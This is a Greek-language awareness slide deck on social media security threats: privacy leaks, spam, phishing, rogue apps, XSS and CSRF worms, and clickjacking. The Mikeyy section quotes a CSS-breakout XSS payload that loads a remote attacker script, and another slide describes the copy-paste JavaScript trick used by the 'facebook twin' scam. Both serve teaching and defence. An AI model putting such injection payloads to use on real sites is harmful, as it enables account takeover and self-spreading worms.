Social Networks Security

Κοινωνικά Δίκτυα-Ασφάλεια
Social Media Security
Παπαδάκης Κων/νος- Cyber Security Consultant
cos_pap@hotmail.com
linkedin.com/in/konstantinos-papadakis

Κοινωνικά Δίκτυα Ασφάλεια
Temet Nosce
Κοινωνικές Προεκτάσεις
Οι άνθρωποι χρησιμοποιούν με κακή πρόθεση τα δίκτυα για:
Εκφοβισμό και απειλή άλλων χρηστών.
Εκβιασμό για αποδέσμευση φωτογραφιών.
Αποστολή μηνυμάτων μίσους (cyberbullying).
Παρακολούθηση της ζωής άλλων χρηστών και η τρομοκρατία στην αληθινή ζωή.
Διασπορά κακόβουλου λογισμικού.
Συλλογή πληροφοριών για τη δημιουργία profile.
Κατασκοπευτικών δραστηριοτήτων: Δημιουργία personas.

Κοινωνικά Δίκτυα Ασφάλεια-Σχεδιασμός
Temet Nosce
Θέματα Σχεδιασμού (Design issues)
Ιδιωτικότητα (Privacy)
Ρύθμιση της Ιδιωτικότητας
FaceBook  “friends”, “friends of friends”, “every-one”
Τwitter Προστασία tweets, email covering
Περιεχόμενο
Το περιεχόμενο το οποίο ανεβάζουμε μπορεί χρησιμοποιηθεί ή και να πωληθεί
*Το 2010 ένας καναδός με τη χρήση λογισμικού (crawler script) κατάφερε να
αποκτήσει πρόσβαση σε 170.000.000 δεδομένα χρηστών

Temet Nosce
Διαγραφή Δεδομένων (Deleting data & accounts)
Μόλις ένα μήνυμα δημοσιευτεί (Post) είναι σχεδόν αδύνατον να διαγραφεί τελείως,
ιδιαίτερα όταν έχει προωθηθεί σε άλλους.
Διαγραφή λογαριασμού.
H Απενεργοποίηση είναι και πραγματική διαγραφή?
Facebook (2 εβδομάδες)  delete page, FAQ (Help Center)
Αποκάλυψη πληροφοριών (Information disclosure )
Αποκάλυψη δεδομένων τοποθεσίας
Facebook (Places), FourSquare, Twitter
Ένοπλες δυνάμεις, εργοδότης…
Ληστείες σε σπίτια (Twitter  PleaseRobMe.com)

Temet Nosce

Temet Nosce
Αποκάλυψη δεδομένων ταυτότητας
Δίκτυα απευθείας συνδεδεμένα με διαδικτυακούς χρήστες σε άλλες πλατφόρμες.
Αναγνώριση επισκέπτη ενός ιστοτόπου, από το αν είναι χρήστης ΜΚΔ.
FingerPrinting Social Network Connections.
Μπορώ να δω αν ένας χρήστης ήταν σε ένα URL.
CSS attribute of links (visited)+ JavaScript.
Συνεργασίες μεταξύ ομάδων για αποκάλυψη της ταυτότητας.
FaceBook Instant Personalization
Επιτρέπει σε τρίτους να αναγνωρίσουν τον χρήστη που επισκέπτεται τον ιστότοπο
τους χωρίς να χρειαστεί να κάνει login, απλώς συνδυάζοντας τα δεδομένα του από τα
κοινωνικά δίκτυα

Temet Nosce
Μη Ασφαλή πλαίσια Λειτουργίας (Insecure frameworks)
Τρωτότητες εντός των πλαισίων λειτουργίας των κοινωνικών δικτύων.
Πρόσβαση σε ιδιωτικές πληροφορίες, μετατροπή λογαριασμών χρηστών.
Facebook (2010)-Πρόβλημα στο privacy setting tool
 Πως το προφίλ σου φαίνεται από κάποιον άλλο.
 Μπορούσες να δεις Chat Conversations, Friend Requests.
SchuelerVZ
 Διαρροή ιδιωτικών πληροφοριών με την power search function.
Facebook (2011)-Αναβάθμιση κώδικα (code update)
 Ένας άγνωστος αριθμός από ιδιωτικά μηνύματα στάλθηκαν σε
λάθος inbox.

Temet Nosce
Μη Ασφαλή πλαίσια Λειτουργίας (Insecure frameworks)
Προβλήματα στον Κώδικα-SQL Injections
 Τρωτότητες στην εισαγωγή ερωτημάτων στη βάση δεδομένων
 Αποκάλυψη δεδομένων {user accounts, passwords, emails, άλλες ευαίσθητες
πληροφορίες}
 Twitter-Facebook 2012-DDoS Attack
 Πρόβλημα στη διαθεσιμότητα της υπηρεσίας
Κακή χρήση των Κοινωνικών Δικτύων
Πιθανούς στόχους για botnet control
 Botnet control over status messages
 Trojan.Whitewell: Χρησιμοποιεί το Facebook ως συντονιστή C&C Server,
λαμβάνοντας μόνο δεδομένα ρυθμίσεων.
 Twitter: Bot κατέβασε τελευταία μηνύματα από προκαθορισμένο λογαριασμό
Twitter bot creator tool
 KreiosC2 bot

Temet Nosce
Κακή χρήση των Κοινωνικών Δικτύων
Διαμοιρασμός πληροφορίας
 Tα κοινωνικά δίκτυα μπορεί να χρησιμοποιηθούν για αποθήκευση αναβαθ-
μίσεων (update) ή απόκρυψη πληροφοριών.
 Trojan το οποίο κατεβάζει binary αναβάθμιση από προκαθορισμένο
προφίλ.
 Η αναβάθμιση μπορεί να ενσωματωθεί σε κάποιο αρχείο media πχ
φωτογραφία.
 Αποστολή των δεδομένων σε άλλο Profile, κρυπτογραφημένα.

Κοινωνικά Δίκτυα Ασφάλεια-Κίνδυνοι
Temet Nosce
Spamming
Παραβιασμένοι (Compromized) ή Ψεύτικοι Λογαριασμοί
(dummy accounts).
Αυτοματοποιημένη διαδικασία (automated script).
 CAPTCHA Tests
Πολλαπλοί Παράλληλοι λογαριασμοί (multiple accounts in parallel).
 Spam Blocking Report Feature
Μails εντός των ΔΚΔ αλλά και από το εξωτερικό (μεγαλύτερη αξιοπιστία).
 New Friend Requests κλπ
 Οι αποδέκτες ξεγελιούνται και ανταποκρίνονται στον σύνδεσμο.
Targeted Spamming
 Αυτοματοποιημένη πρόσβαση (scripts).
 Έρευνα (crawl) για emails, real name, hobbies.
 Personalized spam mails.

Temet Nosce

Temet Nosce
Τοποθέτηση Δολωμάτων (baits in social networks)
Σημαντικά θέματα (topics) πχ Twitter topics.
Δημιουργία spam messages με τα key words από τα topics.
Περίπτωση “0 followers”
 Twitter-2010.
 Ανακάλυψη χαρακτηριστικού το οποίο επέτρεπε σε χρήστες να αναγκάσουν
άλλους να γίνουν followers
Αύξηση των Followers (Follower scams)
Υπόσχεση για αύξηση των followers/day με αντάλλαγμα το username και το
password.
Χρησιμοποίηση του λογαριασμού του χρήστη για αποστολή spam.
Μια άλλη τεχνική είναι η αυτόματη παρακολούθηση (follow) χιλιάδων χρηστών
ή η αποστολή πολλών friend requests με την ελπίδα ότι κάποιος θα ακολουθήσει
το χρήστη .

Temet Nosce
Τοποθέτηση Δολωμάτων (baits in social networks)

Temet Nosce
Αύξηση των Followers (Follower scams)

Temet Nosce
Περίπτωση “0 followers”

Temet Nosce
Μίμηση διασημοτήτων (Impersonation of celebrities)
Ουσιαστικά δεν υπάρχει διαδικασία επιβεβαίωσης μεταξύ
εικονικού και πραγματικού προφίλ.
Με τους ψεύτικους λογαριασμούς μπορεί κάποιος να διαδώσει παραπλανητικές
ειδήσεις, να δελεάσει χρήστες για spam, να κάνει εγγραφή σε χιλιάδες χρήστες ή
να έρθει σε επαφή με πραγματικές “διασημότητες”.
Εκτός από αυτό αρκετοί λογαριασμοί διασημοτήτων είναι ευάλωτοι σε επιθέσεις
password guessing (twitter 2009 attack).
 Twitters Verified Accounts-TVAs.
 Επιβεβαίωση της ταυτότητας του χρήστη.

Temet Nosce
Μίμηση διασημοτήτων (Impersonation of celebrities)

Temet Nosce
Μίμηση φίλων (Impersonation of friends)
Αποκάλυψη του password.
 Phishing attacks.
 Local information-stealing Trojans.
Koobface Malware Attack (W32.Koobface worm)
Στόχευση στους φίλους οι οποίοι λόγω οικειότητας μπορούν να γίνουν πιο
CLICK FRENDLY.
Χρησιμοποιεί επιθέσεις Κοινωνικής Μηχανικής υπολογίζοντας την συμπερι-
φορά αποδοχής των συνδέσμων (link-opening behavior) των χρηστών.
 Μηνύματα από μολυσμένους χρήστες στους φίλους τους.
 Κείμενο ή επικαιροποίηση του status.
Στόχευση στους φίλους οι οποίοι λόγω οικειότητας μπορούν να γίνουν πιο CLICK
FRENDLY.

1. Λαμβάνει μήνυμα (youTube)
2. Click στο Video
3. Download this in order to play video
4. Download KoobFace.exe
5. Koobface take control
1. Access Credentials for other Nets
2. Spamming
3. CAPTCHA Breaker
4. etc

Temet Nosce
Εξαπάτηση-Phishing
Social Network Service.
 Twitters Verified Accounts-TVAs.
 Επιβεβαίωση της ταυτότητας του χρήστη.
Όλοι οι σύνδεσμοι οδηγούν σε ψεύτικη σελίδα
Twitviewer  Twitviewer.net
 Ισχυρίζεται ότι επιτρέπει στους χρήστες να δουν ποιοι διαβάζουν τα μηνύματα
τους χωρίς να ακολουθούν

Temet Nosce
Orkut phishing site using a Brazil carnival theme

Temet Nosce
Βελτιωμένες Απάτες με χρέωση-Advanced fee scams
(419 Scams)
Έρχεται με την κάλυψη μιας όμορφης ιστορίας με τεράστιο
κέρδος, χωρίς την παρεμβολή κάποιου συνδέσμου.
 Ξαφνικά δημιουργείται κάποιο πρόβλημα και ζητείται
κάποια αμοιβή.
Facebook DJs Scam in Miami (2011).
Νέα στοιχεία εισόδου (Reset Passwords).
 User name και ερωτήσεις οι οποίες δόθηκαν στο αρχικό registration.
Στόχευση φίλων (Befriend someone to get information).
 Στόχευση Εταιρειών
 Εύρεση υπαλλήλων του στόχου και προσέγγιση τους (friend request) μέσω
ενός ψεύτικου λογαριασμού
 Χτίσιμο εμπιστοσύνης (build level of trust)
 Έναρξη ερωτήσεων που αφορούν την εταιρεία στόχο
Αποκάλυψη δεδομένων Αναγνώρισης.
 Πχ Σχόλιο στο Twitter για κάποια συσκευή που xρησιμοποιεί ο χρήστης.

Εφαρμογές σε ΜΚΔ (Applications & widgets in social networks)
Temet Nosce
Τα περισσότερα κοινωνικά δίκτυα επιτρέπουν την
ενσωμάτωση εφαρμογών με ενεργό περιεχόμενο
(active content).
Οι εφαρμογές αυτές αλληλεπιδρούν με τον χρήστη
και τους φίλους τους.
Οι εφαρμογές αυτές αλληλεπιδρούν με τον χρήστη και τους φίλους τους.
 Remote Code Execution.
 APIs τα οποία επιτρέπουν την πρόσβαση σε συγκεκριμένη πληροφορία από τον
λογαριασμό του χρήστη.
Παράδειγμα.
 Εφαρμογή η οποία κάνει post καθημερινά ανέκδοτα ή αστεία
 Παιχνίδια πολλαπλών παικτών (multiplayer games)
Τρωτότητα η οποία μπορεί να εκμεταλλευθεί από τον επιτιθέμενο.

Temet Nosce
Example 1 – Never Text Again
Facebook-2013
Σε 300.000 χρήστες εμφανίσθηκε το ακόλουθο μήνυμα:
I am shocked!!! I’m NEVER texting AGAIN since I found this out. Video here:
http://bit.ly/[REMOVED] - Worldwide scandal!
Οι χρήστες (300.000 clicks) ανακατευθύνθηκαν σε μια ψεύτικη εφαρμογή Facebook
της οποίας το URL είχε αρκετή αληθοφάνεια.
 http://apps.facebook.com/wonttextagain/
 http://apps.facebook.com/nevertxtingagain/
Επιλέγοντας (click) την εφαρμογή, άρχισε η εγκατάσταση καθώς και ζητήθηκαν
κάποιες παροχές από τον χρήστη.
Η εφαρμογή ξεκινά τον κύκλο ξανά
Ο χρήστης τελικά δεν μπορεί να δει το video καθώς του ζητάει να συμπληρώσει
μια επισκόπηση.

Temet Nosce

Temet Nosce
To πρόβλημα λύνεται με τη διαγραφή της εφαρμογής από το παράθυρο application
settings.
Example 1 – Never Text Again Facebook-2013
Δυστυχώς η πληροφορία η οποία έχει ήδη μεταφερθεί δεν γίνεται να διαγραφεί.
Example 2 – Candid Camera Prank-2012
Μήνυμα το οποίο ειδοποιεί για κάποιο video.
Μόλις κάποιος χρήστης το ενεργοποιήσει (click), ανακατευθύνεται σε κάποιο
κακόβουλο ιστότοπο.

Temet Nosce
Η εφαρμογή ζητάει άδεια για να κάνει Post στο profil του χρήστη.
Μόλις η άδεια δοθεί, το ίδιο μήνυμα μεταφέρεται και σε άλλα κανάλια.
Example 2 – Candid Camera Prank-2012
Αναβάθμιση του FLV Player.
Αναβάθμιση του FLV Player με το ακόλουθο μήνυμα:
 Your FLV Player seems to be out of date. Please update your FLV Player in order
to proceed. Please click the Continue button now and wait a few seconds.
Με την ενεργοποίηση του μηνύματος ο χρήστης ανακατευθύνεται σε ιστοσελίδα
από την οποία κατεβάζει το FLVDirect.exe το οποίο είναι Trojan.

Temet Nosce
Εφαρμογές οι οποίες οδηγούν σε μη σχετιζόμενο κακόβουλο λογισμικό-Application
leading to unrelated malware
Προβλήματα με το νόμιμο λογισμικό
Δυστυχώς η πληροφορία η οποία έχει ήδη μεταφερθεί δεν γίνεται να
διαγραφεί
FarmVille
Δυνατότητα αγοράς game coins με αληθινά χρήματα (credit card).
Helper tools=Trojans
Τρωτότητες σε Εφαρμογές-Vulnerabilities in applications
Συλλογή προσωπικών πληροφοριών
Επιθέσεις-αλλοιώσεις στις πληροφορίες του χρήστη
Άδειες (permissions) προς κακόβουλο λογισμικό
Facebook basic Applications Types (APIs)-Άδεια από χρήστη
Social PlugIns { Facebook <-> Any Website }
Canvas applications {Profile}
Like Button {Ύπαρξη Σελίδας}
Other Applications {Φόρτωση Κώδικα}

Temet Nosce
Τρωτότητες σε Εφαρμογές-Vulnerabilities in applications
Οι εφαρμογές μπορεί με την απλή αποδοχή τους από τον χρήστη ή και την
ρητή άδεια από αυτόν μπορούν να δώσουν άδεια για πρόσβαση σε πολλές
πληροφορίες:
Δημόσια Πληροφορία [user name, profile picture, list of friends κλπ]
Προφίλ [Γενέθλια, ταινίες, βιβλία κλπ]
Αποστολή email
Πρόσβαση στα posts και δικαίωμα για ποστ
Αποθήκευση των δεδομένων εξωτερικά
Πρόσβαση στα δεδομένα οποιαδήποτε στιγμή (offline access)
Πρόσβαση σε πληροφορίες φίλων
Πρόσβαση σε φωτογραφίες και βίντεο
Πρόσβαση στις πληροφορίες family και Relationships
Ο χρήστης μπορεί να διαγράψει την εφαρμογή
Εάν ένας φίλος σας, δώσει πλήρη δικαιώματα σε μια εφαρμογή μπορεί αυτή
η εφαρμογή να αποκτήσει πρόσβαση και σε δική σας πληροφορία (friends
only)

Κίνδυνοι Περιεχομένου (Content Threats)
Temet Nosce
Μολυσμένα προφίλ Ιστοτόπων
Πρόβλημα στο υλικό το οποίο οι χρήστες ανεβάζουν (Post ή Upload)
Ενσωμάτωση Web attacking Toolkits
Drive by Download Attack
Αποθήκευση για κακόβουλο λογισμικό
Πιθανότητα να περιέχει περιεχόμενο απομακρυσμένης πρόσβασης το οποίο
επιτρέπει στον επιτιθέμενο:
Κακόβουλοι Σύνδεσμοι (Malicious links)
Ανακατευθύνουν τους χρήστες σε κακόβουλους ιστοτόπους
Η ανακατεύθυνση επιτυγχάνεται με:
Κοινωνική Μηχανική (Social engineering) Promising Links
Αυτοματοποιημένα με ενσωμάτωση Ενεργού Περιεχομένου (Αctive Content)
 iFrame Tags-JavaScript-Flash Videos
URL shortening services
http://bit.ly/XuX9i --> http://bit.ly/XuX9i+

Temet Nosce
Script threats
Το κάθε δίκτυο παρέχει APIs για τη λειτουργία εφαρμογών τρίτων πχ για
αναβάθμιση του status από κινητά τηλέφωνα
Μπορεί να γίνει αντικείμενο εκμετάλλευσης από επιτιθέμενο:
Κατασκευή αυτοματοποιημένων scripts για συλλογή πληροφοριών
Εξάπλωση κακόβουλου λογισμικού (worms)
Το θύμα αντιγράφει και εκτελεί το script μόνο του
Manual script Attack
“find your facebook twin” scam [Facebook]
Ο χρήστης ποστάρει σύνδεσμο στο προφίλ του
Εάν ένας χρήστης το ενεργοποιήσει (click) του ζητάει να ακολουθήσει
κάποιες οδηγίες
Press CTRL+C, Press ALT+D,Press CTRL+V,Press ENTER οι οποίες σημαίνουν:
Copy hidden JavaScript,Focus on the users URL bar,Paste the JavaScript,
Execute it
Με αυτό τον τρόπο το script μπορεί να στείλει μηνύματα σε φίλους
για επανάληψη του κύκλου

Temet Nosce

Temet Nosce
Script threats
Google’s Orkut in June 2010
Διασπορά οικειοθελώς χωρίς την εκμετάλλευση κάποιας τρωτότητας
Οι χρήστες δελεάστηκαν με την απόκτηση κάρτας τηλεφώνου για να
ακολουθήσουν κάποιες οδηγίες
Οι οδηγίες περιλάμβαναν αντιγραφή και εκτέλεση κάποιου κεκαλυμμένου
κώδικα (obfuscated JavaScript)
Cross-site scripting (XSS)
Διασπορά του σε φίλους
Ενσωμάτωση κώδικα (script) σε ιστοσελίδες
Οι χρήστες που επισκέπτονται (link) τον συγκεκριμένο ιστότοπο
O κώδικας μεταδίδεται μέσω του browser στο Η/Υ του χρήστη
Ο κώδικας μετά μπορεί να κλέψει session cookies ή να αρχίσει μια επίθεση
cross-site request forgery attacks (CSRF)

Temet Nosce
Script threats
Mikeyy 2012
Το Twitter κτυπήθηκε από δυο XSS Worms
Τρωτότητα XSS σε Cascading Style Sheets (CSS)
Αλλαγή κάποιων στοιχείων (χρώμα…), με αποτέλεσμα ο επιτιθέμενος να
μπορεί να στείλει κακόβουλο κώδικα
Simple style tag closing tag με ένα script element το οποίο έδειχνε σε
ένα απομακρυσμένης εκτέλεσης κακόβουλο script
Με αυτή την τρωτότητα μπορεί να γίνει η φόρτωση κακόβουλου κώδικα
ο οποίος θα εκτελείται κάθε φορά που κάποιος επισκέπτεται ένα
μολυσμένο προφίλ
Normal tag:
<style type=”text/css”> a { color: #0000ff; } </style>
Modified tag with embedded script code:
<style type=”text/css”> a { color: #
</style>mikeyy:) “></a><script src=http://mikeyylolz[REMOVED].com/x.js> </script>

Temet Nosce
Script threats
Mikeyy 2012
Οι χρήστες οι οποίοι κάνουν login στην υπηρεσία και βλέπουν προφίλ
άλλων, ενδέχεται να μολύνουν το δικό τους προφίλ
Επιπλέον ο κακόβουλος κώδικας ποστάρει μηνύματα τα οποία μπορεί να
περιέχουν κακόβουλους συνδέσμους
Τwitter 2012
XSS Attack
Unfiltered Name Field το οποίο επέτρεψε την εισαγωγή κακόβουλου κώδικα

Temet Nosce
Script threats
Cross-site request forgery (CSRF)
Ένα αίτημα φθάνει από τον browser του χρήστη
Ο Web Server δεν μπορεί να ξέρει αν είναι αληθινό ή προέρχεται από
κάποιο κακόβουλο κώδικα
Καθόσον οι περισσότεροι χρήστες παραμένουν συνεχώς συνδεδεμένοι
(authenticated session) στα κοινωνικά δίκτυα είναι εύκολος στόχος για
αυτοματοποιημένους κώδικες ή παραποιημένους ιστοτόπους
Τέτοιου είδους επιθέσεις εκμεταλλεύονται την εμπιστοσύνη την οποία
δείχνει ένας ιστότοπος στον browser και στα requests του
Οι οποίοι μπορούν να εκδώσουν εντολές στη θέση του χρήστη(προσθήκη
φίλου, προσθήκη σχολίου…) εφόσον ο κανονικός χρήστης είναι ακόμα
συνδεδεμένος

Temet Nosce
Script threats
Cross-site request forgery (CSRF)
My Space
Επεισόδιο “Samy is my hero”
Ένας χρήστης με την ονομασία Samy βρήκε τρόπο να εγκαθιστά καλλυμένο
κώδικα (javascript) σε CSS Tags χωρίς να υπάρχει φιλτράρισμα με
αποτέλεσμα να μπορεί να διαβάζει περιεχόμενο και να εκδίδει αιτήματα
(HTTP POST requests)
O Κώδικας που ανέπτυξε ενεργοποιούνταν όταν κάποιος έβλεπε το
μολυσμένο προφίλ (XSS attack) και μετά έστελνε αιτήματα προσθέτοντας
τον χρήστη ως φίλο, προσθέτοντας τη φράση“but most of all, samy is my
hero.” στη περιοχή Hero Section, μαζί με τον κώδικα του για περαιτέρω
εξάπλωση
1.000.000 χρήστες σε 20 ώρες
My Space εκτός λειτουργίας

Temet Nosce
Script threats
Clickjacking
Οι χρήστες θα πρέπει να ξεγελαστούν για να πατήσουν (click)σε πράγματα
τα οποία στη πραγματικότητα δεν βλέπουν
Στις περισσότερες φορές έχουμε φόρτωση ενός αόρατου κώδικα με κάποιο
περιεχόμενο πχ παιχνίδι το οποίο επιτρέπει στον χρήστη να πατήσει πάνω
του πολλές φορές
Ο χρήστης νομίζει ότι πατάει πάνω στο παιχνίδι αλλά ουσιαστικά εκτελεί
άλλες ενέργειες στο παρασκήνιο
Κατάλληλοι κώδικες (javascripts) κάνουν σίγουρο το ότι ο χρήστης πάντα
θα πατάει τον εκτελέσιμο κώδικα
Αυτή η διαδικασία επιτρέπει στον χρήστη να εκτελεί οποιαδήποτε ενέργεια
θέλει.
Ο χρήστης μπορεί να ξεγελαστεί και να πατήσει σε άόρατο κουμπί το οποίο
μπορεί πχ να του αλλάξει τις ρυθμίσεις της ιδιωτικότητας κλπ

Temet Nosce
Script threats
Clickjacking
“Like-jacking”.Συνδυασμός του ClickJacking και Like Button
Δελεαστικά μηνύματα τα οποία περιέχουν συνδέσμους (link)
Ανακατεύθυνση των χρηστών σε ιστότοπο με βασικό μήνυμα “click here to
continue”
Μόλις ο χρήστης πατήσει οποιουδήποτε στη σελίδα ενεργοποιεί ένα Like
Button το οποίο αναβαθμίζει το user status message, όπως το πρώτο
μήνυμα
Προστασία
Antivirus
Add on  NoScript
Μηχανισμοί Ασφαλείας, εντοπισμού clickjacking attacks
Like-Jacking Attacks ακόμα δουλεύουν καθώς το like button μπορεί να
εμφανιστεί σε iframe tags.

Θέματα Πρακτικής για προφύλαξη
Temet Nosce
Προφύλαξη
Σκέψου
Πολιτικές ιδιωτικότητας και ρυθμίσεις
Τις περισσότερες φορές τα κοινωνικά δίκτυα περιέχουν αν όχι άχρηστη
πληροφορία, πολύ πιθανόν επικίνδυνη
 Ψεύτικη πληροφορία
 Κακόβουλο λογισμικό (links, εφαρμογές)
 Κατασκοπεία
Κατανόηση και σωστή ρύθμιση
Κωδικοί Ασφαλείας (passwords)
Σωστή επιλογή, προστασία
Προσοχή στο τι επιλέγουμε να “ανεβάσουμε” (post)
Όταν κάτι “ανέβει” δεν υπάρχει πια έλεγχος του τι έχει γίνει
Nα είσαι ανήσυχος
O φίλος είναι σίγουρα φίλος?
Αναβαθμίσεις
OS, Browser, applications
Προστασία
Χρήση λογισμικού προστασίας

Social Networks Security

Recommended

Recommended

More Related Content

What's hot

What's hot (8)

Similar to Social Networks Security

Similar to Social Networks Security (20)

More from Papadakis K.-Cyber-Information Warfare Analyst & Cyber Defense/Security Consultant-Hellenic MoD

More from Papadakis K.-Cyber-Information Warfare Analyst & Cyber Defense/Security Consultant-Hellenic MoD (20)

Social Networks Security